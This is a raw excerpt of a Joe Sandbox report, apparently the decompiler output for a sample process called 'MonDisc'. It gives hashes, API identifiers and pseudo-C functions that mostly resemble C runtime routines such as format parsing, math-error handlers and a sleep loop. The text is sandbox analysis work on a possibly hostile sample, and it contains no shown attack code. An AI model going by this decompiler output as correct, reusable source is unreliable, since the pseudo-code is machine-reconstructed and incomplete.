                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: 14713f9323f902e043806a4d756279997d674d1848590f3c97bb3f2b7c4c9a1b
                              • Instruction ID: cdfaa6d2db8344b7c44afce7c9311d854bdf8702ccbf84b73afb8ae7eee11ae2
                              • Opcode Fuzzy Hash: 14713f9323f902e043806a4d756279997d674d1848590f3c97bb3f2b7c4c9a1b
                              • Instruction Fuzzy Hash: 5751F827D0CD4645FF22AA38EC5037A6261BF49774F548235E95EB65E2DF3CA4828A02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
                              • String ID:
                              • API String ID: 3115360832-0
                              • Opcode ID: 057d8fa23ac03b650d3b224590ec57b1560f4d8c507465ae7ddcd15c43ac5aa1
                              • Instruction ID: 6179a57cf51987d04aed77a4880a1fac33de67376ad0af2380a3bdb4d03797b4
                              • Opcode Fuzzy Hash: 057d8fa23ac03b650d3b224590ec57b1560f4d8c507465ae7ddcd15c43ac5aa1
                              • Instruction Fuzzy Hash: 3E313032608B85C6DB65CF15E8802AAB3A5FB88B50F444536DB8D83759DF3CD659CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E00007FF67FF62C9D0FB8(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                              				signed int _t27;
                              				signed int _t28;
                              				signed int _t29;
                              				signed int _t30;
                              				signed int _t31;
                              				signed int _t42;
                              				signed int _t43;
                              				signed int _t44;
                              				signed int _t46;
                              				void* _t51;
                              
                              				_a8 = __rbx;
                              				_a16 = __rsi;
                              				_t27 = __ecx & 0x0000001f;
                              				if ((__ecx & 0x00000008) == 0) goto 0x2c9d0fea;
                              				if (sil >= 0) goto 0x2c9d0fea;
                              				E00007FF67FF62C9D0F1C(_t27, _t51);
                              				_t28 = _t27 & 0xfffffff7;
                              				goto 0x2c9d1041;
                              				_t42 = 0x00000004 & dil;
                              				if (_t42 == 0) goto 0x2c9d1005;
                              				asm("dec eax");
                              				if (_t42 >= 0) goto 0x2c9d1005;
                              				E00007FF67FF62C9D0F1C(_t28, _t51);
                              				_t29 = _t28 & 0xfffffffb;
                              				goto 0x2c9d1041;
                              				_t43 = dil & 0x00000001;
                              				if (_t43 == 0) goto 0x2c9d1021;
                              				asm("dec eax");
                              				if (_t43 >= 0) goto 0x2c9d1021;
                              				E00007FF67FF62C9D0F1C(_t29, _t51);
                              				_t30 = _t29 & 0xfffffffe;
                              				goto 0x2c9d1041;
                              				_t44 = dil & 0x00000002;
                              				if (_t44 == 0) goto 0x2c9d1041;
                              				asm("dec eax");
                              				if (_t44 >= 0) goto 0x2c9d1041;
                              				if ((dil & 0x00000010) == 0) goto 0x2c9d103e;
                              				E00007FF67FF62C9D0F1C(_t30, _t51);
                              				_t31 = _t30 & 0xfffffffd;
                              				_t46 = dil & 0x00000010;
                              				if (_t46 == 0) goto 0x2c9d105b;
                              				asm("dec eax");
                              				if (_t46 >= 0) goto 0x2c9d105b;
                              				E00007FF67FF62C9D0F1C(_t31, _t51);
                              				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID:
                              • API String ID: 1156100317-0
                              • Opcode ID: 3076e21c6bfb38f8d326eb162b095d5b0499e511dc8dc8b539aeb44edcf57da2
                              • Instruction ID: 7459ce2c7319353957be4084f52fc5ff95697936e9d656c7d1df035a8517fa8d
                              • Opcode Fuzzy Hash: 3076e21c6bfb38f8d326eb162b095d5b0499e511dc8dc8b539aeb44edcf57da2
                              • Instruction Fuzzy Hash: 8A118C73E5CA8381FF643128EE9637910416F5C374E181634EA7EA62D7CE2CA8816647
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00007FF67FF62C98EEF4(signed int __edi, signed short __rbx, void* __rcx, signed short __rdi, signed short __rsi, signed short __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                              				intOrPtr _t71;
                              				signed int _t72;
                              				intOrPtr _t81;
                              				signed int _t93;
                              				signed int _t96;
                              				signed int _t106;
                              				signed int _t108;
                              				intOrPtr _t120;
                              				signed short* _t140;
                              				signed short* _t141;
                              				signed short* _t143;
                              				void* _t145;
                              				void* _t155;
                              				signed int* _t161;
                              				signed short* _t165;
                              				void* _t168;
                              				void* _t169;
                              				void* _t171;
                              				void* _t174;
                              				signed int* _t175;
                              
                              				_t140 = _t165;
                              				_t140[4] = __rbx;
                              				_t140[8] = __rbp;
                              				_t140[0xc] = __rsi;
                              				_t140[0x10] = __rdi;
                              				_t108 = __edi | 0xffffffff;
                              				_t145 = __rcx;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) == __rbp) goto 0x2c98f17a;
                              				if ( *(__rcx + 0x18) != __rbp) goto 0x2c98ef43;
                              				E00007FF67FF62C984D84(_t140);
                              				 *_t140 = 0x16;
                              				E00007FF67FF62C9C599C();
                              				goto 0x2c98f191;
                              				r12d = 0x20;
                              				 *((intOrPtr*)(__rcx + 0x478)) =  *((intOrPtr*)(__rcx + 0x478)) + 1;
                              				_t71 =  *((intOrPtr*)(__rcx + 0x478));
                              				if (_t71 == 3) goto 0x2c98f18e;
                              				if (_t71 != 2) goto 0x2c98ef77;
                              				if ( *((intOrPtr*)(__rcx + 0x47c)) == 1) goto 0x2c98f18e;
                              				_t141 =  *((intOrPtr*)(__rcx + 0x480));
                              				_t175 = __rcx + 0x34;
                              				_t161 = __rcx + 0x38;
                              				 *((intOrPtr*)(__rcx + 0x47c)) = 0;
                              				 *(__rcx + 0xde8) = _t108;
                              				 *(__rcx + 0xdec) = _t108;
                              				 *_t175 = 0;
                              				 *_t161 = 0;
                              				 *(__rcx + 0x18) = _t141;
                              				 *((intOrPtr*)(__rcx + 0x50)) = 0;
                              				 *((intOrPtr*)(__rcx + 0x2c)) = 0;
                              				_t72 =  *_t141 & 0x0000ffff;
                              				 *(__rcx + 0x42) = _t72;
                              				if (_t72 == 0) goto 0x2c98f164;
                              				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
                              				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x2c98f169;
                              				if (( *(__rcx + 0x42) & 0xffff) - r12w - 0x5a > 0) goto 0x2c98efe4;
                              				_t142 = __rcx - 0x20;
                              				goto 0x2c98efe6;
                              				 *((intOrPtr*)(__rcx + 0x2c)) =  *((intOrPtr*)(0x2ca11bc0 + (__rcx - 0x20) * 8));
                              				if (E00007FF67FF62C99A65C(__rcx, _t155) == 0) goto 0x2c98f18a;
                              				_t81 =  *((intOrPtr*)(_t145 + 0x2c));
                              				if (_t81 == 8) goto 0x2c98f17a;
                              				_t120 = _t81;
                              				if (_t120 == 0) goto 0x2c98f144;
                              				if (_t120 == 0) goto 0x2c98f12f;
                              				if (_t120 == 0) goto 0x2c98f0ef;
                              				if (_t120 == 0) goto 0x2c98f0ad;
                              				if (_t120 == 0) goto 0x2c98f0a6;
                              				if (_t120 == 0) goto 0x2c98f064;
                              				if (_t120 == 0) goto 0x2c98f057;
                              				if (_t81 - 0xfffffffffffffffc != 1) goto 0x2c98f18a;
                              				E00007FF67FF62C9935E8(_t145, _t145, _t155, __rbp, _t174);
                              				goto 0x2c98f14c;
                              				E00007FF67FF62C991C34(_t142, _t145);
                              				goto 0x2c98f14c;
                              				if ( *(_t145 + 0x42) == 0x2a) goto 0x2c98f07b;
                              				E00007FF67FF62C98DBB0(_t142, _t145, _t145, _t161, __rdi, _t161, _t171, _t169);
                              				goto 0x2c98f14c;
                              				if (E00007FF67FF62C99A018(_t142, _t145, _t145, _t161, _t168) == 0) goto 0x2c98f18a;
                              				if ( *((intOrPtr*)(_t145 + 0x478)) != 1) goto 0x2c98f09e;
                              				if ( *((intOrPtr*)(_t145 + 0x47c)) != 1) goto 0x2c98f150;
                              				if ( *_t161 >= 0) goto 0x2c98f0eb;
                              				 *_t161 = _t108;
                              				goto 0x2c98f0eb;
                              				 *_t161 = 0;
                              				goto 0x2c98f150;
                              				if ( *(_t145 + 0x42) == 0x2a) goto 0x2c98f0bc;
                              				goto 0x2c98f071;
                              				if (E00007FF67FF62C999B68(_t142, _t145, _t145, _t161, _t168) == 0) goto 0x2c98f18a;
                              				if ( *((intOrPtr*)(_t145 + 0x478)) != 1) goto 0x2c98f0db;
                              				if ( *((intOrPtr*)(_t145 + 0x47c)) != 1) goto 0x2c98f150;
                              				_t93 =  *_t175;
                              				if (_t93 >= 0) goto 0x2c98f0eb;
                              				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000004;
                              				 *_t175 =  ~_t93;
                              				goto 0x2c98f14c;
                              				_t96 =  *(_t145 + 0x42) & 0x0000ffff;
                              				if (_t96 == r12w) goto 0x2c98f129;
                              				if (_t96 == 0x23) goto 0x2c98f123;
                              				if (_t96 == 0x2b) goto 0x2c98f11d;
                              				if (_t96 == 0x2d) goto 0x2c98f117;
                              				if (_t96 != 0x30) goto 0x2c98f150;
                              				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000008;
                              				goto 0x2c98f150;
                              				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000004;
                              				goto 0x2c98f150;
                              				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000001;
                              				goto 0x2c98f150;
                              				 *(_t145 + 0x30) =  *(_t145 + 0x30) | r12d;
                              				goto 0x2c98f150;
                              				 *(_t145 + 0x30) =  *(_t145 + 0x30) | 0x00000002;
                              				goto 0x2c98f150;
                              				 *_t175 = 0;
                              				 *((intOrPtr*)(_t145 + 0x40)) = bpl;
                              				 *(_t145 + 0x30) = 0;
                              				 *_t161 = _t108;
                              				 *((intOrPtr*)(_t145 + 0x3c)) = 0;
                              				 *((intOrPtr*)(_t145 + 0x54)) = bpl;
                              				goto 0x2c98f150;
                              				E00007FF67FF62C990430(_t145);
                              				if (1 == 0) goto 0x2c98f18a;
                              				_t143 =  *((intOrPtr*)(_t145 + 0x18));
                              				_t106 =  *_t143 & 0x0000ffff;
                              				 *(_t145 + 0x42) = _t106;
                              				if (_t106 != 0) goto 0x2c98efb7;
                              				 *((long long*)(_t145 + 0x18)) =  *((long long*)(_t145 + 0x18)) + 2;
                              				if (E00007FF67FF62C99AA7C(_t143, _t145) == 0) goto 0x2c98f18a;
                              				goto 0x2c98ef50;
                              				E00007FF67FF62C984D84(_t143);
                              				 *_t143 = 0x16;
                              				E00007FF67FF62C9C599C();
                              				goto 0x2c98f191;
                              				return  *((intOrPtr*)(_t145 + 0x28));
                              			}


                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: $*
                              • API String ID: 3215553584-3982473090
                              • Opcode ID: 275899da83e6f953a675a57fdfb1b8234a7f4d34997464dc48c4c510f8842327
                              • Instruction ID: 3b4b2037375902518b116183210ab80c1cdc5c7cb189c0ef7cce0ea0db0534cd
                              • Opcode Fuzzy Hash: 275899da83e6f953a675a57fdfb1b8234a7f4d34997464dc48c4c510f8842327
                              • Instruction Fuzzy Hash: D881AF72D18202CAEF649F25C844A7C37A4EB05BA8F546235CA4DC739ADF3EE541CB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00007FF67FF62C98E108(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                              
                              				_a8 = __rbx;
                              				_a16 = __rbp;
                              				_a24 = __rsi;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) != 0) goto 0x2c98e15f;
                              				E00007FF67FF62C984D84(__rax);
                              				 *__rax = 0x16;
                              				E00007FF67FF62C9C599C();
                              				return __edi | 0xffffffff;
                              			}


                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: $*
                              • API String ID: 3215553584-3982473090
                              • Opcode ID: ba5aed07b6fadc15dc00dd5cb749b4d39d53a8e2895e59b106f77d7c832d3ef9
                              • Instruction ID: 5ad8be3901c596657a861832007016cdb9c9c343930e9a8b6b4befdaed1da821
                              • Opcode Fuzzy Hash: ba5aed07b6fadc15dc00dd5cb749b4d39d53a8e2895e59b106f77d7c832d3ef9
                              • Instruction Fuzzy Hash: 5F816476C0C2C68AEF648F25886457C37A9EB16BA8F140236CB49C7797DE39E941C707
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: "$sinh
                              • API String ID: 1156100317-1232919748
                              • Opcode ID: c8156585b93c5acfaba7c5c73c329d02f6965153ef06ae8bbc729b8366ed9201
                              • Instruction ID: 96863ef2efd592e5810dae0e48bf683f333171caa9206e294a9473258f34ed97
                              • Opcode Fuzzy Hash: c8156585b93c5acfaba7c5c73c329d02f6965153ef06ae8bbc729b8366ed9201
                              • Instruction Fuzzy Hash: 1B919822D28F8588DA63CB34B8513B57358AF663E5F519333E58E71A66DF6CE0838701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: !$acos
                              • API String ID: 1156100317-2870037509
                              • Opcode ID: fc471cf3e77b66e404aa7a745e5a39227ae5e81015ea62415c338c8aefb05f38
                              • Instruction ID: 200d9f966abe40536c337745dca57c5106090a6eb0e15dd5b1ea0ad545c30246
                              • Opcode Fuzzy Hash: fc471cf3e77b66e404aa7a745e5a39227ae5e81015ea62415c338c8aefb05f38
                              • Instruction Fuzzy Hash: 3361B721D2CF4989EA23CB38BC503769754BF663E0F128336E95EB5D65DF2CE0824601
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _set_statfp
                              • String ID: !$asin
                              • API String ID: 1156100317-2188059690
                              • Opcode ID: 7113f2bb44cd2ffda8fc6149d82887779e1fba1a3ae1f7fd9967d967e71fe84d
                              • Instruction ID: 0c5ae3d423a0b421fa46ed97eb2e0c5186bf3e96162fbb34071268e2e97ff6d5
                              • Opcode Fuzzy Hash: 7113f2bb44cd2ffda8fc6149d82887779e1fba1a3ae1f7fd9967d967e71fe84d
                              • Instruction Fuzzy Hash: C751A921D2CF49C5EA13CB38BC51376A354BF663E0F128336E95EB5A65DF2DA0828701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E00007FF67FF62C916910(long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rbp, long long __r14, long long _a8, long long _a16, long long _a24, long long _a32) {
                              				intOrPtr _t37;
                              				signed char _t40;
                              				void* _t58;
                              				intOrPtr _t60;
                              				void* _t67;
                              				void* _t68;
                              				void* _t71;
                              
                              				_a32 = __rbx;
                              				 *((intOrPtr*)(__rcx + 0x50))();
                              				Sleep(??);
                              				if ( *((intOrPtr*)(__rcx + 0x90)) != 0) goto 0x2c9169db;
                              				_a8 = __rbp;
                              				_a16 = __rdi;
                              				_a24 = __r14;
                              				r14d = 0x47;
                              				_t60 =  *__rcx;
                              				E00007FF67FF62C9EE0B0();
                              				 *((intOrPtr*)(__rcx + 0x3c)) =  *((intOrPtr*)(__rcx + 0x3c)) + 1;
                              				_t40 =  *(_t60 + 0x91) & 0x000000ff;
                              				if ((_t40 & 0x000000e0) != 0) goto 0x2c9169b1;
                              				_t37 =  *((intOrPtr*)(_t60 + 0xb8));
                              				if (_t37 < 0) goto 0x2c91697d;
                              				goto 0x2c91699d;
                              				if (_t37 != 0xffffffff) goto 0x2c916987;
                              				goto 0x2c91699d;
                              				if (_t37 != 0xfffffffe) goto 0x2c916991;
                              				goto 0x2c91699d;
                              				_t31 =  ==  ? r14d : 0x4a;
                              				 *((intOrPtr*)(__rcx + 0x40)) =  ==  ? r14d : 0x4a;
                              				 *(_t60 + 0x91) = _t40 | 0x00000080;
                              				E00007FF67FF62C8FFCF0(_t37, __rcx, _t60, _t58, _t60, __rbp, _t67, _t68, __r14, _t71);
                              				E00007FF67FF62C9EE0B8();
                              				Sleep(??);
                              				if ( *((intOrPtr*)(__rcx + 0x90)) == 0) goto 0x2c916950;
                              				 *((intOrPtr*)(__rcx + 0x58))();
                              				return 0;
                              			}


                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Sleep$AcquireCriticalLeaveLockSection
                              • String ID:
                              • API String ID: 1711459333-0
                              • Opcode ID: 8bff635730d18e62b8c5ba54141f2cfb47b45429cdf546357ab3a6131a260e01
                              • Instruction ID: 09a5473a5e9af49e8af6a2d4ca76c840cd3dd0b496ef0919275007a0719e2926
                              • Opcode Fuzzy Hash: 8bff635730d18e62b8c5ba54141f2cfb47b45429cdf546357ab3a6131a260e01
                              • Instruction Fuzzy Hash: 95217F32E0CA8187DB588F28988137C7365FB45B75F141235EA6E826D9CF7CE945CB02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLastVirtual$FreeQuery
                              • String ID:
                              • API String ID: 2187276999-0
                              • Opcode ID: b3dfd8fdebdf336bd3649c607cabc9316637ede27637d673395c608ceccb4a5d
                              • Instruction ID: bc53e9b13fdaa83b3c713f87617b3435433ebed20d3bda400750e55eb9a20c30
                              • Opcode Fuzzy Hash: b3dfd8fdebdf336bd3649c607cabc9316637ede27637d673395c608ceccb4a5d
                              • Instruction Fuzzy Hash: D8117B31F0CB81C2FF618B19B80512966B5FB48BE0F484135E65D92B99DF7CD5908701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E00007FF67FF62C98DEE4(void* __edx, signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, void* __rbp, long long _a8, long long _a16) {
                              				void* _t88;
                              				signed int _t96;
                              				signed int _t103;
                              				signed int _t105;
                              				char _t107;
                              				void* _t108;
                              				signed int _t110;
                              				signed int _t118;
                              				intOrPtr* _t134;
                              				intOrPtr* _t138;
                              				void* _t140;
                              				char _t148;
                              				void* _t153;
                              
                              				_t154 = __rbp;
                              				_t134 = __rax;
                              				_t108 = __edx;
                              				_a8 = __rbx;
                              				_a16 = __rdi;
                              				_t140 = __rcx;
                              				_t110 = __edi | 0xffffffff;
                              				if ( *((intOrPtr*)(__rcx + 0x468)) == 0) goto 0x2c98e0e3;
                              				if (E00007FF67FF62C99AE4C( *((intOrPtr*)(__rcx + 0x468))) == 0) goto 0x2c98e0f3;
                              				if ( *((long long*)(__rcx + 0x18)) != 0) goto 0x2c98df35;
                              				E00007FF67FF62C984D84(_t134);
                              				 *_t134 = 0x16;
                              				E00007FF67FF62C9C599C();
                              				goto 0x2c98e0f5;
                              				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                              				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x2c98e0de;
                              				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
                              				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
                              				goto 0x2c98e0aa;
                              				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
                              				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x2c98e0bf;
                              				_t148 =  *((char*)(__rcx + 0x41));
                              				if (_t148 - 0x20 - 0x5a > 0) goto 0x2c98df84;
                              				goto 0x2c98df86;
                              				_t96 =  *(0x2ca11bc0 + (_t148 - 0x20) * 8);
                              				 *(__rcx + 0x2c) = _t96;
                              				if (_t96 == 8) goto 0x2c98e0e3;
                              				_t118 = _t96;
                              				if (_t118 == 0) goto 0x2c98e09e;
                              				if (_t118 == 0) goto 0x2c98e085;
                              				if (_t118 == 0) goto 0x2c98e050;
                              				if (_t118 == 0) goto 0x2c98e025;
                              				if (_t118 == 0) goto 0x2c98e01c;
                              				if (_t118 == 0) goto 0x2c98dff0;
                              				if (_t118 == 0) goto 0x2c98dfe3;
                              				if (_t96 - 0xfffffffffffffffc != 1) goto 0x2c98e0f3;
                              				E00007FF67FF62C992418(__rcx, __rcx, _t148, _t153, __rbp);
                              				goto 0x2c98e0a6;
                              				E00007FF67FF62C991200(_t148 - 0x20, _t140);
                              				goto 0x2c98e0a6;
                              				if (_t108 == 0x2a) goto 0x2c98e006;
                              				E00007FF67FF62C98D734(_t148 - 0x20, _t140, _t140, _t140 + 0x38, _t154);
                              				goto 0x2c98e0a6;
                              				 *((long long*)(_t140 + 0x20)) =  *((long long*)(_t140 + 0x20)) + 8;
                              				_t103 =  *( *((intOrPtr*)(_t140 + 0x20)) - 8);
                              				_t104 =  <  ? _t110 : _t103;
                              				 *(_t140 + 0x38) =  <  ? _t110 : _t103;
                              				goto 0x2c98e04c;
                              				 *(_t140 + 0x38) =  *(_t140 + 0x38) & 0x00000000;
                              				goto 0x2c98e0aa;
                              				if (_t108 == 0x2a) goto 0x2c98e030;
                              				goto 0x2c98dff9;
                              				 *((long long*)(_t140 + 0x20)) =  *((long long*)(_t140 + 0x20)) + 8;
                              				_t105 =  *( *((intOrPtr*)(_t140 + 0x20)) - 8);
                              				 *(_t140 + 0x34) = _t105;
                              				if (_t105 >= 0) goto 0x2c98e04c;
                              				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000004;
                              				 *(_t140 + 0x34) =  ~_t105;
                              				goto 0x2c98e0a6;
                              				_t88 = _t108;
                              				if (_t108 == 0x20) goto 0x2c98e07f;
                              				if (_t88 == 0x23) goto 0x2c98e079;
                              				if (_t88 == 0x2b) goto 0x2c98e073;
                              				if (_t88 == 0x2d) goto 0x2c98e06d;
                              				if (_t88 != 0x30) goto 0x2c98e0aa;
                              				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000008;
                              				goto 0x2c98e0aa;
                              				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000004;
                              				goto 0x2c98e0aa;
                              				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000001;
                              				goto 0x2c98e0aa;
                              				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000020;
                              				goto 0x2c98e0aa;
                              				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000002;
                              				goto 0x2c98e0aa;
                              				 *(_t140 + 0x34) =  *(_t140 + 0x34) & 0x00000000;
                              				 *(_t140 + 0x30) =  *(_t140 + 0x30) & 0x00000000;
                              				 *(_t140 + 0x3c) =  *(_t140 + 0x3c) & 0x00000000;
                              				 *((char*)(_t140 + 0x40)) = 0;
                              				 *(_t140 + 0x38) = _t110;
                              				 *((char*)(_t140 + 0x54)) = 0;
                              				goto 0x2c98e0aa;
                              				if (E00007FF67FF62C9900E4(_t140) == 0) goto 0x2c98e0f3;
                              				_t138 =  *((intOrPtr*)(_t140 + 0x18));
                              				_t107 =  *_t138;
                              				 *((char*)(_t140 + 0x41)) = _t107;
                              				if (_t107 != 0) goto 0x2c98df5c;
                              				 *((long long*)(_t140 + 0x18)) =  *((long long*)(_t140 + 0x18)) + 1;
                              				if ( *((intOrPtr*)(_t140 + 0x2c)) == 0) goto 0x2c98e0cb;
                              				if ( *((intOrPtr*)(_t140 + 0x2c)) != 7) goto 0x2c98e0e3;
                              				 *((intOrPtr*)(_t140 + 0x470)) =  *((intOrPtr*)(_t140 + 0x470)) + 1;
                              				if ( *((intOrPtr*)(_t140 + 0x470)) != 2) goto 0x2c98df4f;
                              				goto 0x2c98e0f5;
                              				E00007FF67FF62C984D84(_t138);
                              				 *_t138 = 0x16;
                              				E00007FF67FF62C9C599C();
                              				return _t110;
                              			}
















                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: 32f5ee6cc32af364903e309e24421653fa8da446cabe00959c3228adf4030057
                              • Instruction ID: b5030537f341d675d62111747b55861762c68033ddbab1c7a29fc8ed59e8db36
                              • Opcode Fuzzy Hash: 32f5ee6cc32af364903e309e24421653fa8da446cabe00959c3228adf4030057
                              • Instruction Fuzzy Hash: 58618577D1C286C6EF688F288864B7C37A9EB15BA8F141735C60A872DACF2DD441C603
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 52%
                              			E00007FF67FF62C98E5C0(void* __edx, signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, signed int __rsi, void* __rbp, long long _a8, long long _a16, long long _a24) {
                              				void* _t82;
                              				intOrPtr _t87;
                              				signed int _t94;
                              				signed int _t96;
                              				char _t98;
                              				void* _t99;
                              				signed int _t101;
                              				intOrPtr _t109;
                              				void* _t131;
                              				char _t138;
                              				signed int _t143;
                              
                              				_t145 = __rbp;
                              				_t143 = __rsi;
                              				_t99 = __edx;
                              				_a8 = __rbx;
                              				_a16 = __rsi;
                              				_a24 = __rdi;
                              				_t101 = __edi | 0xffffffff;
